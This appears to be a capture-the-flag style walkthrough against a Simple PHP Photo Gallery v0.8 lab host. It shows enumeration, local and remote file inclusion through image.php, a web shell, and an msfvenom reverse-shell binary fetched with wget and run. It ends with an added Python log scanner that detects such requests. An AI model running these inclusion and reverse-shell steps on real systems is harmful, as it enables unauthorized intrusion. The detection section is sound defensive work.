4 :80
http://192.168.144.58/
Simple PHP Photo Gallery landing page
$ gobuster dir -u http://192.168.144.58 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt -t 80
===============================================================
/images (Status: 301) [Size: 237] [--> http://192.168.144.58/images/]
/image.php (Status: 200) [Size: 1508]
/photos (Status: 301) [Size: 237] [--> http://192.168.144.58/photos/]
/css (Status: 301) [Size: 234] [--> http://192.168.144.58/css/]
/license.txt (Status: 200) [Size: 18511]
/index.php (Status: 200) [Size: 2730]
/db.php (Status: 200) [Size: 0]
/README.txt (Status: 200) [Size: 4041]
/js (Status: 301) [Size: 233] [--> http://192.168.144.58/js/]
/functions.php (Status: 200) [Size: 0]
http://192.168.144.58/image.php
Simple PHP Photo Gallery v0.8
# nikto
+ OSVDB-3093: /db.php: This might be interesting... has been seen in web logs from an unknown scanner.
Using https://www.exploit-db.com/exploits/48424
http://192.168.144.58/image.php?img=/etc/passwd
root:x:0:0:root:/root:/bin/bash
[truncated]
michael:x:1000:1000:Michael:/home/michael:/bin/bash
# RFI also works
http://192.168.144.58/image.php?img=http://192.168.49.144/web.php
# got web shell
CMD: whoami;id;hostname;uname -a
apache
uid=48(apache) gid=48(apache) groups=48(apache) context=system_u:system_r:httpd_t:s0
snookums
Linux snookums 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
# stable shell
$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.49.144 LPORT=445 -f elf -o kshell
CMD: wget 192.168.49.144/kshell -O /tmp/kshell && chmod +x /tmp/kshell && /tmp/kshell
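# detection (added example, not part of the original notes)
The two image.php?img= requests above (absolute local path, remote URL) leave a clear trace in the web server's access log; this added example flags them, including percent-encoded traversal. Assumptions: combined log format, legitimate img values are relative file names inside the gallery, and the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Client IP, request target and status from a "combined" access-log line.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) .*?"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
SCHEME_RE = re.compile(r'^[a-z][a-z0-9+.-]*:', re.I)  # http:, ftp:, php:, data: ...

def classify_img(value):
    """Label one decoded img value, or return None if it looks like a gallery file."""
    if SCHEME_RE.match(value) or value.startswith("//"):
        return "remote-or-wrapper-include"
    segments = value.replace("\\", "/").split("/")
    if value.startswith("/") or ".." in segments:
        return "path-outside-gallery"
    return None

def scan(lines, script="/image.php", param="img"):
    """Return (ip, status, label, value) for every suspicious img request."""
    findings = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        if url.path != script:
            continue
        # parse_qs percent-decodes, so %2e%2e%2f is inspected as ../
        for value in parse_qs(url.query, keep_blank_values=True).get(param, []):
            label = classify_img(value)
            if label:
                findings.append((m["ip"], int(m["status"]), label, value))
    return findings

# Constructed sample log lines (not captured from the target).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /image.php?img=photos/sunset.jpg HTTP/1.1" 200 1508 "-" "-"',
    '192.168.49.144 - - [01/Jan/2024:10:00:05 +0000] "GET /image.php?img=/etc/passwd HTTP/1.1" 200 1508 "-" "-"',
    '192.168.49.144 - - [01/Jan/2024:10:00:09 +0000] "GET /image.php?img=http://192.168.49.144/web.php HTTP/1.1" 200 312 "-" "-"',
    '192.168.49.144 - - [01/Jan/2024:10:00:12 +0000] "GET /image.php?img=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 200 1508 "-" "-"',
    '10.0.0.5 - - [01/Jan/2024:10:00:15 +0000] "GET /index.php?img=/etc/passwd HTTP/1.1" 200 2730 "-" "-"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A hit with status 200 deserves a closer look than a 4xx, since the server returned content for a path or URL outside the gallery.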